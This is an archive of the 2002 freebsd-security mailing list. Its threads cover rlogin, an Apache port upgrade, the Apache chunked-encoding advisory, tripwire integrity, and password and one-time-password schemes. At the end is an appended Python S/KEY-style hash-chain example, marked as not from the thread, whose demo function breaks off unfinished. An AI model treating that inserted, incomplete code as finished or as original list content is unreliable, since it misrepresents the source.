text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Fernando Gleiser wrote: > On Tue, 18 Jun 2002, Alex Michlin wrote: > > >>I remember seeing a FreeBSD advisory on a bug in login. Now, for the >>real story... What is behind this is: I just downloaded the latest Saint >>version and ran it against a server. It said there login was vunerable. >>I'm not sure how it knows if there is a bug or just information (but it is >>listed under the critical section). > > > saint checks wheter the login *service* (512/tcp, a.k.a rlogin) is runing, > it doesn't check for vulnerabilities in the login *program* (/usr/bin/login) > > rlogin is insecure because it sends everyting in cleartext and may be > vulnerable to ip spoofing if you use .rhosts for authentication. > Just coment it out in inetd.conf and use ssh instead. > > > Fer > > >>Thanks again, >> >>Alex >> >>On Tue, 18 Jun 2002, Eric F Crist wrote: >> >> >>>What kind of a bug in login are you seeing? If you completely disable >>>the login utility, you would not be able to logon locally, which could >>>make an upgrade difficult. If you simply want to disable logon for >>>specific users, simply set their shell to /etc/nologin or some other >>>non-existent file/shell. >>> >>>HTH >>> >>>Eric F Crist >>>President/Sys Admin >>>AdTech Integrated Systems, Inc >>>http://www.adtechintegrated.com >>> >>> >>>-----Original Message----- >>>From: owner-freebsd-security@FreeBSD.ORG >>>[mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Alex Michlin >>>Sent: Tuesday, June 18, 2002 2:23 PM >>>To: freebsd-security@FreeBSD.ORG >>>Subject: Disable Login >>> >>>I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the >>>server to upgrade the os (make world...). 
As a temporary fix, can I >>>chmod >>>000 logon or possibly even remove it completely? Should everything >>>function correctly? (OpenSSH mainly)? >>> You can disable Login being used by ssh...edit the /etc/ssh/sshd_config file UseLogin must be set to no. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 20:57:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id EAB9437B406 for ; Tue, 18 Jun 2002 20:57:22 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA09237; Tue, 18 Jun 2002 21:57:09 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618215553.0230da10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 21:57:05 -0600 To: Lawrence Sica , security@FreeBSD.ORG From: Brett Glass Subject: Re: CDs with patched Apache? In-Reply-To: <3D0FDE0D.2040100@earthlink.net> References: <200206180539.XAA26264@lariat.org> <200206180539.XAA26264@lariat.org> <4.3.2.7.2.20020618033604.00d42aa0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:27 PM 6/18/2002, Lawrence Sica wrote: >Honestly I never use the CD packages since they will be outdated by the time I use it. That's exactly why commercial software vendors have moved to a "CD plus downloaded patches" model. They want you to buy a CD but also want you to have the latest patches. 
--Brett

From owner-freebsd-security Tue Jun 18 21: 6:17 2002
Date: Tue, 18 Jun 2002 22:06:10 -0600 (CST)
From: Ryan Thompson
To: freebsd-security@freebsd.org
Subject: Password security
Message-ID: <20020618204711.I65632-100000@ren.sasknow.com>

Hi all,

My staffers are using plain old passwords for logins. ALL logins are
via SSH from various platforms, using passwords. Some are logging in
from Windows clients that don't support much else. And, on the
security/convenience continuum, I won't have much of a network to
secure if nobody gets any work done. :-)

I'm well aware of the inherent insecurity of what your average human
can remember. It's currently a weak link for us, so it is one aspect
of our security that I would like to improve. So, for the purposes of
this message, please assume all other avenues have been secured. ;-)

So, given the limitations of remote access (from machines assumed to
be insecure), and some fairly dumb Windows clients, what are some
solutions to password security?

The best I've come up with so far is to issue random passwords, from
an array of 68 possible characters (alpha num and some easily-typed
symbols). I issue two passwords for each user.
One is short enough to be remembered with a small effort (6 characters,
entropy > 2^36, assuming my randomizer is up to par). The second
password is longer (10 characters, > 2^60), and is designed to be
printed on a small card that the user carries with them like a token or
a key. Obviously, you could argue the merits of shorter vs. longer keys.
My choices are still quite arbitrary at this stage. New passwords would
be issued at regular intervals. (Remember, these are staff members. I
can do that. :-)

I realize there is nothing particularly novel about this idea.

When staffers log in, they just append both passwords, obtaining a 16
character password with 2^97 possibilities. (*not* worth the effort
required to brute force, given the other weaker avenues available).

So, the idea is that a much better overall entropy is obtained, like
using a secret password plus a physical key.

The unlikely worst case: an attacker knows this system (password length
and character set), physically mugs a user, is able to obtain the
system password hash, AND has the resources to brute force the
remaining 6 character remembered secret. This still gives the staff
member several hours to change his or her password if he/she suspects
the key was compromised.

I know that people *want* to re-use their favorite dictionary
password(s)... so there will be *some* resistance to a system like the
above... but does anyone have any comments on either the system from a
password security standpoint, or from a managerial/practical
standpoint? Have you done something similar? Completely different?

I'm not really interested in a "passwords are bad" debate, unless there
are readily available technologies of which I'm not aware that can be
deployed across many dumb insecure computers across an insecure network.

Thanks!
- Ryan

--
Ryan Thompson
SaskNow Technologies - http://www.sasknow.com
901 1st Avenue North - Saskatoon, SK - S7K 1Y4
Tel: 306-664-3600 Fax: 306-664-3630
Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security Tue Jun 18 21:15: 4 2002
Date: 19 Jun 2002 06:14:08 +0200
From: Jan Lentfer
To: freebsd-security@freebsd.org
Subject: Apache 1.3.26 port
Message-Id: <1024460049.2166.6.camel@jan-linnb.lan>

Hi,

I am new to this list, so I don't know if this is the right place for
my comment, so please be gentle ;-)

After reading all the mail about the apache vulnerability, today I
installed the new 1.3.26 port. The compilation, etc. went clean; I also
had to reinstall mod_php4 and mod_fastcgi until I could make apache
start.
Then I found that all my subdirectories in /usr/local/data/www were
gone (deleted)!! Luckily this was on my private machine! Is this a
normal behaviour? Anyway, it's good I know it now, so I will for sure
back up the directories on my production machines.

Regards,

Jan Lentfer

From owner-freebsd-security Tue Jun 18 21:18: 6 2002
Date: Tue, 18 Jun 2002 21:17:59 -0700 (PDT)
From: Muhammad Faisal Rauf Danka
To: freebsd-security@freebsd.org
Subject: Apache Web Server Chunk Handling Vulnerability
Reply-To: mfrd@attitudex.com
Message-Id: <20020619041759.ECD6E2756@sitemail.everyone.net>

There is a remotely exploitable vulnerability in the way that Apache
web servers (or other web servers based on their source code) handle
data encoded in chunks. This vulnerability is present by default in
configurations of Apache web server versions 1.2.2 and above, 1.3
through 1.3.24, and versions 2.0 through 2.0.36.
The impact of this vulnerability is dependent upon the software version
and the hardware platform the server is running on.

Detailed CERT advisory can be found at:
http://www.cert.org/advisories/CA-2002-17.html

You can download the new releases from:
http://www.apache.org/dist/httpd/

Regards,
---------
Muhammad Faisal Rauf Danka
Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Vice President
Pakistan Computer Emergency Response Team (PakCERT)
web: www.pakcert.org
Chief Security Analyst
Applied Technology Research Center (ATRC)
web: www.atrc.net.pk

From owner-freebsd-security Tue Jun 18 21:35:54 2002
Date: Tue, 18 Jun 2002 23:34:46 -0500
From: "Eric F Crist"
To: "'Klaus Steden'", "'Maxlor'"
Subject: RE: preventing tampering with tripwire
Message-ID: <000b01c2174a$a75d8d20$77fe180c@armageddon>
In-Reply-To: <20020618194958.K99167@cthulu.compt.com>

AFAIK, you could use a simple floppy disk, possibly a secondary one if
you use the primary one (they're only like $20 US nowadays...). That
makes the setting and un-setting of read-only fairly simple.

I don't remember how big tripwire (the executable) and its config files
are, or you *could* use a ZIP disk.

Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Klaus Steden
Sent: Tuesday, June 18, 2002 6:50 PM
To: Maxlor
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: preventing tampering with tripwire

Read-only media is a good thing, too. It may be overkill (in the case
of security, is there such a thing, though?), but you could re-purpose
an old disk drive, add security tools you want to it, and jumper it
read-only. That wouldn't necessarily prevent your database from being
compromised, but your tools would be intact.

With a read-only disk, I would ...

- install the security tools you want on it
- generate any baseline configuration data and signatures
- make the disk physically read-only
- run your nightly cron jobs, comparing your daily results against your
  read-only baseline.

Of course, every time you upgrade something, you'll have to unjumper
the disk, update your signatures, and rejumper it, but that's not
really such a big deal when compared with what else you might have to
do. :>

Keeping known good copies of essential programs (ls, find, dd, netstat,
route, ifconfig, mv, cp, df, etc.) on the read-only media is a good
idea, too.
You could accomplish this with CDROMs if you don't want to use a disk
drive, but you lose the option of rewritability.

hope this helps,
Klaus

From owner-freebsd-security Tue Jun 18 21:47:55 2002
Date: Tue, 18 Jun 2002 23:47:00 -0500
From: "Eric F Crist"
To: "'Ryan Thompson'", freebsd-security@FreeBSD.ORG
Subject: RE: Password security
Message-ID: <000c01c2174c$5a38f230$77fe180c@armageddon>
In-Reply-To: <20020618204711.I65632-100000@ren.sasknow.com>

Have you explored the idea of biometrics? It requires a piece of
hardware on each computer that is going to access the network, but the
way you're making your security requirements sound, the security
benefit is worth the cost.
Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Ryan Thompson
Sent: Tuesday, June 18, 2002 11:06 PM
To: freebsd-security@FreeBSD.ORG
Subject: Password security

Hi all,

My staffers are using plain old passwords for logins. ALL logins are
via SSH from various platforms, using passwords. Some are logging in
from Windows clients that don't support much else. And, on the
security/convenience continuum, I won't have much of a network to
secure if nobody gets any work done. :-)

I'm well aware of the inherent insecurity of what your average human
can remember. It's currently a weak link for us, so it is one aspect
of our security that I would like to improve. So, for the purposes of
this message, please assume all other avenues have been secured. ;-)

So, given the limitations of remote access (from machines assumed to
be insecure), and some fairly dumb Windows clients, what are some
solutions to password security?

The best I've come up with so far is to issue random passwords, from
an array of 68 possible characters (alpha num and some easily-typed
symbols). I issue two passwords for each user. One is short enough to
be remembered with a small effort (6 characters, entropy > 2^36,
assuming my randomizer is up to par). The second password is longer
(10 characters, > 2^60), and is designed to be printed on a small card
that the user carries with them like a token or a key. Obviously, you
could argue the merits of shorter vs. longer keys. My choices are
still quite arbitrary at this stage. New passwords would be issued at
regular intervals. (Remember, these are staff members. I can do that.
:-)

I realize there is nothing particularly novel about this idea.

When staffers log in, they just append both passwords, obtaining a 16
character password with 2^97 possibilities.
(*not* worth the effort required to brute force, given the other weaker
avenues available).

So, the idea is that a much better overall entropy is obtained, like
using a secret password plus a physical key.

The unlikely worst case: an attacker knows this system (password length
and character set), physically mugs a user, is able to obtain the
system password hash, AND has the resources to brute force the
remaining 6 character remembered secret. This still gives the staff
member several hours to change his or her password if he/she suspects
the key was compromised.

I know that people *want* to re-use their favorite dictionary
password(s)... so there will be *some* resistance to a system like the
above... but does anyone have any comments on either the system from a
password security standpoint, or from a managerial/practical
standpoint? Have you done something similar? Completely different?

I'm not really interested in a "passwords are bad" debate, unless there
are readily available technologies of which I'm not aware that can be
deployed across many dumb insecure computers across an insecure network.

Thanks!
- Ryan

--
Ryan Thompson
SaskNow Technologies - http://www.sasknow.com
901 1st Avenue North - Saskatoon, SK - S7K 1Y4
Tel: 306-664-3600 Fax: 306-664-3630
Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security Tue Jun 18 21:57:48 2002
Date: Wed, 19 Jun 2002 12:57:40 +0800
From: Calvin NG
To: Eric F Crist
Cc: 'Klaus Steden', 'Maxlor', freebsd-security@FreeBSD.ORG
Subject: Re: preventing tampering with tripwire
Message-ID: <20020619125740.L73593@brel.com>
In-Reply-To: <000b01c2174a$a75d8d20$77fe180c@armageddon>

Greetings,

For me, I do an MD5 hash of the files in /var/adm/tcheck/database, plus
keep a copy of the files offsite. The MD5 lets me easily verify that
the tripwire databases are still reliable, and I know I've got a
reliable copy somewhere if it happens to get compromised, or I get
paranoia, whichever happens first ;-)

Regards,
/calvin

lines with :> are quotes from Eric F Crist's email
:> AFAIK, you could use a simple floppy disk, possibly a secondary one if
:> you use the primary one (they're only like $20 US nowadays...). That
:> makes the setting and un-setting of read-only fairly simple.
:>
:> I don't remember how big tripwire (the executable) and its config files
:> are, or you *could* use a ZIP disk.
:>
:> Eric F Crist
:> President/Sys Admin
:> AdTech Integrated Systems, Inc
:> http://www.adtechintegrated.com
:>

From owner-freebsd-security Tue Jun 18 22: 4:59 2002
Date: Tue, 18 Jun 2002 23:04:44 -0600 (CST)
From: Ryan Thompson
To: Eric F Crist
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: Password security
In-Reply-To: <000c01c2174c$5a38f230$77fe180c@armageddon>
Message-ID: <20020618225214.L74293-100000@ren.sasknow.com>

Hi Eric,

Eric F Crist wrote to 'Ryan Thompson' and freebsd-security@FreeBSD.ORG:

> Have you explored the idea of biometrics?

Yes. Bad idea. I knew someone would suggest that. My original post was
too long already to include biometrics, so, since you asked, here it
is. :-)

> It requires a piece of hardware on each computer that is going to
> access the network, but the way you're making your security
> requirements sound, the security benefit is worth the cost.

Depending on the metric somewhat, collecting biometrics on insecure
systems is a serious security risk. Hardware costs aside (about 20
terminals, a few of which are home systems not even owned by the
company), it's far too easy to replay biometrics if the end system
isn't secure... and, last time I checked, most of my employees had
only 10 fingers each. Once those are gone, what then? Eyeballs? :-)

So, on a lot of levels, biometrics are not an option.

So, let's stick with password security for now. :-)

> Eric F Crist
> President/Sys Admin
> AdTech Integrated Systems, Inc
> http://www.adtechintegrated.com

--
Ryan Thompson
SaskNow Technologies - http://www.sasknow.com
901 1st Avenue North - Saskatoon, SK - S7K 1Y4
Tel: 306-664-3600 Fax: 306-664-3630
Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security Tue Jun 18 22:13:34 2002
Date: Tue, 18 Jun 2002 23:13:26 -0600 (CST)
From: Ryan Thompson
To: Tom Rhodes
Cc: freebsd-security@freebsd.org
Subject: Re: Password security
In-Reply-To: <3D103A8A.2000503@pittgoth.com>
Message-ID: <20020618230452.X74293-100000@ren.sasknow.com>

Hi Tom,

Tom Rhodes wrote to Ryan Thompson:

> Ryan,
>
> Did you know that ssh supports keys?

Yes. :-)

The basic problem with public/private key encryption is the security
and installation of the private key. I don't expect users to be able
to properly secure their private key on insecure systems.

> The method described above would also be wonderful to keep users
> from accessing the system outside the workplace.

Which is one of the main reasons it won't work, given that a fair
percentage of our staff access the system from outside the workplace.
:-)

Thanks,
- Ryan

--
Ryan Thompson
SaskNow Technologies - http://www.sasknow.com
901 1st Avenue North - Saskatoon, SK - S7K 1Y4
Tel: 306-664-3600 Fax: 306-664-3630
Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security Tue Jun 18 22:26: 7 2002
Date: Wed, 19 Jun 2002 06:25:54 +0100
From: Colin Percival
To: Ryan Thompson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password security
In-Reply-To: <20020618230452.X74293-100000@ren.sasknow.com>
Message-Id: <5.0.2.1.1.20020619062008.029dc740@popserver.sfu.ca>

At 23:13 18/06/2002 -0600, Ryan Thompson wrote:
>The basic problem with public/private key encryption is the security
>and installation of the private key. I don't expect users to be able
>to properly secure their private key on insecure systems.

I don't expect users to be able to properly guard against keyloggers on
insecure systems, either.
Colin Percival

From owner-freebsd-security Tue Jun 18 22:32:50 2002
Date: Wed, 19 Jun 2002 13:32:41 +0800
From: Calvin NG
To: Ryan Thompson
Cc: Tom Rhodes, freebsd-security@FreeBSD.ORG
Subject: Re: Password security
Message-ID: <20020619133241.M73593@brel.com>
In-Reply-To: <20020618230452.X74293-100000@ren.sasknow.com>

Greetings,

If you are worried about insecure "access terminals/workstations", then
you will be worried about sniffers on them. Password is out.

S/Key has a higher chance of success, if you can give the user a
secured way of calculating the password. The initialisation of the key
can be done from a secured terminal, or at the console of your server
(under supervision), which I think we can assume is secured (right?).
The passphrase can use your system for passwords: part of it in their
head, the other part written down on a card. That leaves the secure
entering of the passphrase to generate the one-time pass.

Alternatively, you can generate 10 one-time passwords at a time, for
the user to carry around and use. And they come back to you to
re-init/get the next 10 passwords.
Yet another alternative: issue PDAs that have s/key calculators.
Whatever.

Well, I use s/key when I am travelling and need to have remote access.
And I don't trust dial-ups, and terminals in internet cafes or at the
conference locations that much. Well, you know what I mean.

Regards,
/calvin

lines with :> are quotes from Ryan Thompson's email
:>
:> Hi Tom,
:>
:>
:> Tom Rhodes wrote to Ryan Thompson:
:>
:> > Ryan,
:> >
:> > Did you know that ssh supports keys?
:>
:> Yes. :-)
:>
:> The basic problem with public/private key encryption is the security
:> and installation of the private key. I don't expect users to be able
:> to properly secure their private key on insecure systems.
:>
:>
:> > The method described above would also be wonderful to keep users
:> > from accessing the system outside the workplace.
:>
:> Which is one of the main reasons it won't work, given that a fair
:> percentage of our staff access the system from outside the workplace,
:> :-)
:>
:> Thanks,
:> - Ryan
:>

From owner-freebsd-security Tue Jun 18 22:36:15 2002
Date: Wed, 19 Jun 2002 01:36:04 -0400
From: Klaus Steden
To: Ryan Thompson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password security
Message-ID: <20020619013603.O99167@cthulu.compt.com>
In-Reply-To: <20020618204711.I65632-100000@ren.sasknow.com>
> My staffers are using plain old passwords for logins. ALL logins are
> via SSH from various platforms, using passwords. Some are logging in
> from Windows clients that don't support much else. And, on the
> security/convenience continuum, I won't have much of a network to
> secure if nobody gets any work done. :-)
>
> I'm well aware of the inherent insecurity of what your average human
> can remember. It's currently a weak link for us, so it is one aspect
> of our security that I would like to improve. So, for the purposes of
> this message, please assume all other avenues have been secured. ;-)
>
> So, given the limitations of remote access (from machines assumed to
> be insecure), and some fairly dumb Windows clients, what are some
> solutions to password security?
>
> The best I've come up with so far is to issue random passwords, from
> an array of 68 possible characters (alpha num and some easily-typed
> symbols). I issue two passwords for each user. One is short enough to
> be remembered with a small effort (6 characters, entropy > 2^36,
> assuming my randomizer is up to par). The second password is longer
> (10 characters, > 2^60), and is designed to be printed on a small card
> that the user carries with them like a token or a key. Obviously, you
> could argue the merits of shorter vs. longer keys. My choices are
> still quite arbitrary at this stage. New passwords would be issued at
> regular intervals. (Remember, these are staff members. I can do that.
> :-)
>
In the meantime, you could crack them on a regular basis for them. John
the Ripper does a pretty good job of my password files, with a
dictionary of about 6 million odd words. It's usually a bit of an
eye-opener for someone to discover his 'highly secure' password staring
at him when he opens his email.
HTH,
Klaus

From owner-freebsd-security Tue Jun 18 23: 1:55 2002
Date: 19 Jun 2002 08:00:57 +0200
From: Jan Lentfer
To: Bob K
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
In-Reply-To: <20020619011913.J5464@yip.org>
Message-Id: <1024466457.2166.9.camel@jan-linnb.lan>

On Wed, 2002-06-19 at 07:19, Bob K wrote:
> Backups, especially before upgrades, are generally a good idea...

I know :).
I did this upgrade at 5:30 am before my first coffee - maybe not the best time and condition :)

Thanks,
Jan

From owner-freebsd-security Wed Jun 19 00:08:18 2002
To: security@freebsd.org
From: Majordomo@FreeBSD.ORG
Subject: Majordomo results
Reply-To: Majordomo@FreeBSD.ORG
Message-Id: <20020619070806.2DF4037B40D@hub.freebsd.org>
Date: Wed, 19 Jun 2002 00:08:06 -0700 (PDT)

--

>>>> Hello majordomo,
**** Command 'hello' not recognized.
>>>>
>>>> unsubscribe freebsd-security
**** unsubscribe: 'security@freebsd.org' is not a member of list 'freebsd-security'.
**** contact "postmaster@FreeBSD.ORG" if you need help.
>>>>
>>>> --
END OF COMMANDS
**** Help for Majordomo@FreeBSD.ORG:

***********************************************************************
Majordomo can not process MIME or HTML. Please send only plain ASCII email to Majordomo. Thank you.
***********************************************************************

This help message is being sent to you from the Majordomo mailing list management system at Majordomo@FreeBSD.ORG. This is version 1.94.4 of Majordomo.

If you're familiar with mail servers, an advanced user's summary of Majordomo's commands appears at the end of this message.

Majordomo is an automated system which allows users to subscribe and unsubscribe to mailing lists, and to retrieve files from list archives.

You can interact with the Majordomo software by sending it commands in the body of mail messages addressed to "Majordomo@FreeBSD.ORG".
Please do not put your commands on the subject line; Majordomo does not process commands in the subject line.

You may put multiple Majordomo commands in the same mail message. Put each command on a line by itself.

If you use a "signature block" at the end of your mail, Majordomo may mistakenly believe each line of your message is a command; you will then receive spurious error messages. To keep this from happening, either put a line starting with a hyphen ("-") before your signature, or put a line with just the word

    end

on it in the same place. This will stop the Majordomo software from processing your signature as bad commands.

Here are some of the things you can do using Majordomo:

I. FINDING OUT WHICH LISTS ARE ON THIS SYSTEM

To get a list of publicly-available mailing lists on this system, put the following line in the body of your mail message to Majordomo@FreeBSD.ORG:

    lists

Each line will contain the name of a mailing list and a brief description of the list.

To get more information about a particular list, use the "info" command, supplying the name of the list. For example, if the name of the list about which you wish information is "demo-list", you would put the line

    info demo-list

in the body of the mail message.

II. SUBSCRIBING TO A LIST

Once you've determined that you wish to subscribe to one or more lists on this system, you can send commands to Majordomo to have it add you to the list, so you can begin receiving mailings.

To receive list mail at the address from which you're sending your mail, simply say "subscribe" followed by the list's name:

    subscribe demo-list

If for some reason you wish to have the mailings go to a different address (a friend's address, a specific other system on which you have an account, or an address which is more correct than the one that automatically appears in the "From:" header on the mail you send), you would add that address to the command. For instance, if you're sending a request from your work account, but wish to receive "demo-list" mail at your personal account (for which we will use "jqpublic@my-isp.com" as an example), you'd put the line

    subscribe demo-list jqpublic@my-isp.com

in the mail message body.

Based on configuration decisions made by the list owners, you may be added to the mailing list automatically. You may also receive notification that an authorization key is required for subscription. Another message will be sent to the address to be subscribed (which may or may not be the same as yours) containing the key, and directing the user to send a command found in that message back to Majordomo@FreeBSD.ORG. (This can be a bit of extra hassle, but it helps keep you from being swamped in extra email by someone who forged requests from your address.)

You may also get a message that your subscription is being forwarded to the list owner for approval; some lists have waiting lists, or policies about who may subscribe. If your request is forwarded for approval, the list owner should contact you soon after your request.

Upon subscribing, you should receive an introductory message, containing list policies and features. Save this message for future reference; it will also contain exact directions for unsubscribing. If you lose the intro mail and would like another copy of the policies, send this message to Majordomo@FreeBSD.ORG:

    intro demo-list

(substituting, of course, the real name of your list for "demo-list").

III. UNSUBSCRIBING FROM MAILING LISTS

Your original intro message contains the exact command which should be used to remove your address from the list. However, in most cases, you may simply send the command "unsubscribe" followed by the list name:

    unsubscribe demo-list

(This command may fail if your provider has changed the way your address is shown in your mail.)

To remove an address other than the one from which you're sending the request, give that address in the command:

    unsubscribe demo-list jqpublic@my-isp.com

In either of these cases, you can tell Majordomo@FreeBSD.ORG to remove the address in question from all lists on this server by using "*" in place of the list name:

    unsubscribe *
    unsubscribe * jqpublic@my-isp.com

IV. FINDING THE LISTS TO WHICH AN ADDRESS IS SUBSCRIBED

To find the lists to which your address is subscribed, send this command in the body of a mail message to Majordomo@FreeBSD.ORG:

    which

You can look for other addresses, or parts of an address, by specifying the text for which Majordomo should search. For instance, to find which users at my-isp.com are subscribed to which lists, you might send the command

    which my-isp.com

Note that many list owners completely or fully disable the "which" command, considering it a privacy violation.

V. FINDING OUT WHO'S SUBSCRIBED TO A LIST

To get a list of the addresses on a particular list, you may use the "who" command, followed by the name of the list:

    who demo-list

Note that many list owners allow only a list's subscribers to use the "who" command, or disable it completely, believing it to be a privacy violation.

VI. RETRIEVING FILES FROM A LIST'S ARCHIVES

Many list owners keep archives of files associated with a list. These may include:
- back issues of the list
- help files, user profiles, and other documents associated with the list
- daily, monthly, or yearly archives for the list

To find out if a list has any files associated with it, use the "index" command:

    index demo-list

If you see files in which you're interested, you may retrieve them by using the "get" command and specifying the list name and archive filename. For instance, to retrieve the files called "profile.form" (presumably a form to fill out with your profile) and "demo-list.9611" (presumably the messages posted to the list in November 1996), you would put the lines

    get demo-list profile.form
    get demo-list demo-list.9611

in your mail to Majordomo@FreeBSD.ORG.

VII. GETTING MORE HELP

To contact a human site manager, send mail to postmaster@FreeBSD.ORG. To get another copy of this help message, send mail to Majordomo@FreeBSD.ORG with a line saying

    help

in the message body.

VIII. COMMAND SUMMARY FOR ADVANCED USERS

In the description below items contained in []'s are optional. When providing the item, do not include the []'s around it. Items in angle brackets, such as <list>, are meta-symbols that should be replaced by appropriate text without the angle brackets.

It understands the following commands:

    subscribe <list> [<address>]
        Subscribe yourself (or <address> if specified) to the named <list>.

    unsubscribe <list> [<address>]
        Unsubscribe yourself (or <address> if specified) from the named <list>.
        "unsubscribe *" will remove you (or <address>) from all lists. This
        _may not_ work if you have subscribed using multiple addresses.

    get <list> <filename>
        Get a file related to <list>.

    index <list>
        Return an index of files you can "get" for <list>.

    which [<address>]
        Find out which lists you (or <address> if specified) are on.

    who <list>
        Find out who is on the named <list>.

    info <list>
        Retrieve the general introductory information for the named <list>.

    intro <list>
        Retrieve the introductory message sent to new users. Non-subscribers
        may not be able to retrieve this.

    lists
        Show the lists served by this Majordomo server.

    help
        Retrieve this message.

    end
        Stop processing commands (useful if your mailer adds a signature).

Commands should be sent in the body of an email message to "Majordomo@FreeBSD.ORG". Multiple commands can be processed provided each occurs on a separate line. Commands in the "Subject:" line are NOT processed.

If you have any questions or problems, please contact "Majordomo-Owner@FreeBSD.ORG".

From owner-freebsd-security Wed Jun 19 02:35:13 2002
X-URL: http://www.ofug.org/~des/
To: "Eric F Crist"
Cc: "'Ryan Thompson'" ,
Subject: Re: Password security
References: <000c01c2174c$5a38f230$77fe180c@armageddon>
From: Dag-Erling Smorgrav
Date: 19 Jun 2002 11:35:06 +0200
In-Reply-To: <000c01c2174c$5a38f230$77fe180c@armageddon>

"Eric F Crist" writes:
> Have you explored the idea of biometrics? It requires a piece of
> hardware on each computer that is going to access the network, but the
> way you're making your security requirements sound, the security benefit
> is worth the cost.

1) Biometrics can't be used reliably for remote access.

2) I don't know of any currently available biometric authentication device that can't be easily fooled.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jun 19 02:40:19 2002
X-URL: http://www.ofug.org/~des/
To: Ryan Thompson
Cc: freebsd-security@freebsd.org
Subject: Re: Password security
References: <20020618204711.I65632-100000@ren.sasknow.com>
From: Dag-Erling Smorgrav
Date: 19 Jun 2002 11:39:51 +0200
In-Reply-To: <20020618204711.I65632-100000@ren.sasknow.com>

Ryan Thompson writes:
> So, given the limitations of remote access (from machines assumed to
> be insecure), and some fairly dumb Windows clients, what are some
> solutions to password security?

You need a challenge/response-based authentication mechanism. If your users all have PDAs, you can use OPIE (provided you can find or write an OPIE calculator that will run on their PDAs); or you can use CRYPTOCard tokens. The server software runs on Windows and Linux (I'm working on getting the Linux version to run on FreeBSD); all you need on the FreeBSD side is pam_radius.

DES
--
Dag-Erling Smorgrav - des@ofug.org
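The challenge/response mechanism DES recommends, shown as an added example that is not from this thread and not OPIE's own code: a Lamport/S/KEY-style hash chain of the kind OPIE implements, with SHA-256 standing in for OPIE's folded MD5/SHA1 and six-word encoding, and a constructed user, seed and passphrase. The server keeps only the top of the chain, so a response captured from an insecure Windows client (or keylogged, or replayed) is worthless once it has been used.

```python
import hashlib
import hmac
import secrets


def H(data: bytes) -> bytes:
    """One chain step. SHA-256 here; real OPIE folds MD5/SHA1 down to 64 bits."""
    return hashlib.sha256(data).digest()


def chain_value(passphrase: str, seed: str, n: int) -> bytes:
    """n-fold hash of seed||passphrase: the one-time password for sequence number n."""
    x = H(seed.encode() + passphrase.encode())
    for _ in range(n):
        x = H(x)
    return x


class OtpServer:
    """Server side (what a PAM module would consult). Never stores the passphrase."""

    def __init__(self):
        self.users = {}  # user -> {"seq": int, "seed": str, "top": bytes}

    def enroll(self, user, passphrase, count=100, seed=None):
        # Done once over a trusted channel (OPIE's opiepasswd does this step).
        # Only h^count and the sequence number are kept.
        seed = seed or secrets.token_hex(4)
        self.users[user] = {"seq": count, "seed": seed,
                            "top": chain_value(passphrase, seed, count)}
        return seed

    def challenge(self, user: str) -> str:
        u = self.users[user]
        if u["seq"] <= 0:
            raise RuntimeError("chain exhausted; re-enroll the user")
        return "otp-sha256 %d %s" % (u["seq"] - 1, u["seed"])

    def verify(self, user: str, response: bytes) -> bool:
        u = self.users[user]
        if u["seq"] <= 0:
            return False
        # Hashing the response once must reproduce the stored chain top.
        if not hmac.compare_digest(H(response), u["top"]):
            return False
        # Accept, then move the stored top down the chain: this response is now dead.
        u["top"] = response
        u["seq"] -= 1
        return True


class OtpClient:
    """The calculator on the user's PDA: needs the passphrase, never transmits it."""

    def __init__(self, passphrase: str):
        self.passphrase = passphrase

    def respond(self, challenge: str) -> bytes:
        _algo, seq, seed = challenge.split()
        return chain_value(self.passphrase, seed, int(seq))


def demo() -> dict:
    """Constructed exchange: enrollment, two logins, one replay, one wrong passphrase."""
    server = OtpServer()
    server.enroll("alice", "constructed passphrase 1234", count=5, seed="fb4711")
    client = OtpClient("constructed passphrase 1234")

    ch1 = server.challenge("alice")          # "otp-sha256 4 fb4711"
    r1 = client.respond(ch1)
    first = server.verify("alice", r1)
    replay = server.verify("alice", r1)      # captured and resent: the top has moved on
    second = server.verify("alice", client.respond(server.challenge("alice")))
    wrong = server.verify("alice", OtpClient("guess").respond(server.challenge("alice")))
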